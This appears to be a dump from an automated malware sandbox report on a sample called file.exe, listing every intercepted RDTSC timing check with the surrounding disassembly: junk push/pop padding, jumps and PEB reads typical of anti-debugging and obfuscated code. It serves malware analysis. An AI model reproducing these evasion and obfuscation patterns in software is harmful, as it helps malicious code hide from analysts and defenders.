Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB5D8 second address: ABB606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D1Bh 0x00000009 jnc 00007F1CB4FA4D16h 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F1CB4FA4D1Bh 0x00000019 pushad 0x0000001a popad 0x0000001b jnp 00007F1CB4FA4D16h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB606 second address: ABB60C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB60C second address: ABB612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB612 second address: ABB616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D2CB second address: B9D2D1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D2D1 second address: B9D2D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D2D9 second address: B9D2ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1CB4FA4D22h 0x0000000c jne 00007F1CB4FA4D16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1971 second address: BA1982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F7964Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1982 second address: BA1986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD77AB second address: BD77BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F7964Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDDCF1 second address: BDDD09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F1CB4FA4D1Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE3B16 second address: BE3B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE3B1A second address: BE3B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE3B23 second address: BE3B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007F1CB4F79646h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE3B35 second address: BE3B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D28h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F1CB4FA4D1Fh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB254 second address: BDB26D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79653h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB26D second address: BDB272 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF867 second address: BEF897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79655h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F1CB4F7964Ch 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F1CB4F7964Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF897 second address: BEF8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEFA15 second address: BEFA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1CB4F7964Eh 0x0000000a popad 0x0000000b jo 00007F1CB4F7965Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB4FC3 second address: CB4FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB50F3 second address: CB5103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F1CB4F79646h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5103 second address: CB5109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5109 second address: CB5126 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 jnc 00007F1CB4F7964Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F1CB4F79674h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5126 second address: CB5131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5131 second address: CB5135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB529D second address: CB52AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1CB4FA4D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB540E second address: CB5413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB55C5 second address: CB55D7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CB4FA4D18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB55D7 second address: CB55F8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CB4F79646h 0x00000008 jmp 00007F1CB4F79657h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB58C5 second address: CB58DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D21h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB58DB second address: CB58E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5A2B second address: CB5A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1CB4FA4D16h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5A36 second address: CB5A42 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1CB4F7964Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5E4A second address: CB5E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBA196 second address: CBA19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBA79D second address: CBA7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBA7A2 second address: CBA7C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F1CB4F79646h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1CB4F7964Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBA7C0 second address: CBA810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F1CB4FA4D18h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 js 00007F1CB4FA4D16h 0x0000002b push dword ptr [ebp+122D3391h] 0x00000031 add dx, FAF0h 0x00000036 push B3F52B6Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F1CB4FA4D1Ah 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBC076 second address: CBC07A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8001B second address: 6F80033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80033 second address: 6F8005E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F1CB4F79659h 0x00000011 mov eax, 4A103FA7h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8005E second address: 6F80097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CB4FA4D23h 0x00000009 add esi, 553D3AEEh 0x0000000f jmp 00007F1CB4FA4D29h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80097 second address: 6F800A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F800A7 second address: 6F800AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F800AB second address: 6F800AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F800AF second address: 6F800B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F800B5 second address: 6F800D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F79657h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F800D0 second address: 6F8014C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F1CB4FA4D1Ch 0x00000014 and ecx, 3262C728h 0x0000001a jmp 00007F1CB4FA4D1Bh 0x0000001f popfd 0x00000020 mov cx, 041Fh 0x00000024 popad 0x00000025 mov eax, dword ptr fs:[00000030h] 0x0000002b pushad 0x0000002c mov si, 5817h 0x00000030 mov edx, esi 0x00000032 popad 0x00000033 sub esp, 18h 0x00000036 jmp 00007F1CB4FA4D26h 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F1CB4FA4D1Ah 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8014C second address: 6F8015B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F7964Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8015B second address: 6F80202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4FA4D1Fh 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F1CB4FA4D25h 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F1CB4FA4D1Eh 0x00000019 mov ebx, dword ptr [eax+10h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F1CB4FA4D1Eh 0x00000023 sub esi, 2E8493D8h 0x00000029 jmp 00007F1CB4FA4D1Bh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F1CB4FA4D28h 0x00000035 sub ah, 00000038h 0x00000038 jmp 00007F1CB4FA4D1Bh 0x0000003d popfd 0x0000003e popad 0x0000003f xchg eax, esi 0x00000040 jmp 00007F1CB4FA4D26h 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80202 second address: 6F80206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80206 second address: 6F80253 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F1CB4FA4D29h 0x0000000c movzx eax, di 0x0000000f pop edi 0x00000010 popad 0x00000011 xchg eax, esi 0x00000012 jmp 00007F1CB4FA4D28h 0x00000017 mov esi, dword ptr [74E806ECh] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov eax, edx 0x00000022 mov ax, dx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80253 second address: 6F80300 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4F79650h 0x00000008 mov eax, 0D92E991h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test esi, esi 0x00000012 jmp 00007F1CB4F7964Ch 0x00000017 jne 00007F1CB4F7A518h 0x0000001d jmp 00007F1CB4F79650h 0x00000022 xchg eax, edi 0x00000023 jmp 00007F1CB4F79650h 0x00000028 push eax 0x00000029 pushad 0x0000002a pushad 0x0000002b jmp 00007F1CB4F79657h 0x00000030 mov bx, si 0x00000033 popad 0x00000034 mov cx, CFCBh 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov edx, 6D929C3Eh 0x00000042 pushfd 0x00000043 jmp 00007F1CB4F7964Fh 0x00000048 sbb ecx, 78BC90EEh 0x0000004e jmp 00007F1CB4F79659h 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80300 second address: 6F80306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80306 second address: 6F8032B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79653h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [74E50B60h] 0x00000011 mov eax, 750BE5E0h 0x00000016 ret 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov bl, 6Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8032B second address: 6F80331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80331 second address: 6F80335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80335 second address: 6F80339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80339 second address: 6F80366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a jmp 00007F1CB4F79657h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bx, EBE6h 0x00000017 mov cx, dx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80366 second address: 6F803B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov dh, ah 0x0000000d jmp 00007F1CB4FA4D23h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1CB4FA4D24h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F803B1 second address: 6F80413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 711E8AC4h 0x00000008 mov ebx, 78DB8F30h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, edi 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 mov cx, bx 0x00000017 popad 0x00000018 push dword ptr [eax] 0x0000001a pushad 0x0000001b mov edx, 538C268Ch 0x00000020 mov bl, 1Fh 0x00000022 popad 0x00000023 mov eax, dword ptr fs:[00000030h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F1CB4F79659h 0x00000032 sbb ax, 4016h 0x00000037 jmp 00007F1CB4F79651h 0x0000003c popfd 0x0000003d mov si, AA87h 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80413 second address: 6F80436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CB4FA4D1Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80436 second address: 6F80446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F7964Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F804FD second address: 6F80503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80503 second address: 6F80528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79653h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov si, FBA7h 0x00000014 mov bl, ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80663 second address: 6F80714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d push ecx 0x0000000e call 00007F1CB4FA4D23h 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 pushad 0x00000016 jmp 00007F1CB4FA4D24h 0x0000001b mov cx, 14F1h 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [esi+18h], eax 0x00000024 jmp 00007F1CB4FA4D1Ch 0x00000029 mov eax, dword ptr [ebx+58h] 0x0000002c pushad 0x0000002d movzx eax, bx 0x00000030 pushfd 0x00000031 jmp 00007F1CB4FA4D23h 0x00000036 sbb al, 0000000Eh 0x00000039 jmp 00007F1CB4FA4D29h 0x0000003e popfd 0x0000003f popad 0x00000040 mov dword ptr [esi+1Ch], eax 0x00000043 jmp 00007F1CB4FA4D1Eh 0x00000048 mov eax, dword ptr [ebx+5Ch] 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F1CB4FA4D1Ch 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80714 second address: 6F807B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b jmp 00007F1CB4F79653h 0x00000010 mov eax, dword ptr [ebx+60h] 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F1CB4F79652h 0x0000001a mov si, C7E1h 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F1CB4F7964Eh 0x00000025 and cx, 5878h 0x0000002a jmp 00007F1CB4F7964Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov dword ptr [esi+24h], eax 0x00000034 jmp 00007F1CB4F79656h 0x00000039 mov eax, dword ptr [ebx+64h] 0x0000003c jmp 00007F1CB4F79650h 0x00000041 mov dword ptr [esi+28h], eax 0x00000044 jmp 00007F1CB4F79650h 0x00000049 mov eax, dword ptr [ebx+68h] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F807B7 second address: 6F807BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F807BB second address: 6F807BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F807BF second address: 6F807C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F807C5 second address: 6F807CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F807CB second address: 6F807CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F807CF second address: 6F8088F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F7964Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+2Ch], eax 0x0000000e pushad 0x0000000f call 00007F1CB4F7964Eh 0x00000014 push eax 0x00000015 pop edi 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007F1CB4F79657h 0x0000001d add cx, 750Eh 0x00000022 jmp 00007F1CB4F79659h 0x00000027 popfd 0x00000028 popad 0x00000029 mov ax, word ptr [ebx+6Ch] 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F1CB4F7964Ch 0x00000034 add eax, 5C82EB88h 0x0000003a jmp 00007F1CB4F7964Bh 0x0000003f popfd 0x00000040 mov ax, 57FFh 0x00000044 popad 0x00000045 mov word ptr [esi+30h], ax 0x00000049 jmp 00007F1CB4F79652h 0x0000004e mov ax, word ptr [ebx+00000088h] 0x00000055 jmp 00007F1CB4F79650h 0x0000005a mov word ptr [esi+32h], ax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8088F second address: 6F80893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80893 second address: 6F808A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 mov eax, dword ptr [ebx+0000008Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F808A8 second address: 6F808AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F808AC second address: 6F808C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
